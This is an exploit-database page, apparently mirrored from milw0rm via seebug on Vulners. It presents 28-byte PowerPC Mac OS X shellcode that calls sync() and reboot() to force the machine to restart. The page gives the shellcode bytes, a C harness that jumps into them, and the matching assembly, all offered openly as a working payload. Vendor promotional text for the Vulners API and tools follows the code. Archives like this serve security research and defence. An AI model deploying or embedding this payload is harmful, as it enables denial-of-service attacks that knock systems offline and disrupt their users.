Lucene search
K

os-x/PPC reboot 28 bytes

🗓️ 26 Sep 2004 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 8 Views

PPC OS X shellcode that reboots the machine using sync() function, 28 bytes in size.

Code

                                                /*
PPC OSX/Darwin Shellcode by B-r00t. 2003.
Does sync() reboot();
See ASM below.
28 Bytes.
*/

char shellcode[] =
"\x7c\x63\x1a\x79"
"\x39\x40\x01\x70"
"\x38\x0a\xfe\xb4"
"\x44\xff\xff\x02"
"\x60\x60\x60\x60"
"\x38\x0a\xfe\xc7"
"\x44\xff\xff\x02";

int main (void) 
{
        __asm__("b _shellcode");
}

/*
; PPC OS X / Darwin Shellcode by B-r00t.
; sync() reboot().
; Simply reboots the machine! - Just 4 Fun! 
;
.globl _main
.text
_main:
        xor.    r3, r3, r3 
        li      r10, 368
        addi    r0, r10, -332
        .long   0x44ffff02
        .long   0x60606060
        addi    r0, r10, -313
        .long   0x44ffff02
*/

// milw0rm.com [2004-09-26]
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Sep 2004 00:00Current
7.1High risk
Vulners AI Score7.1
8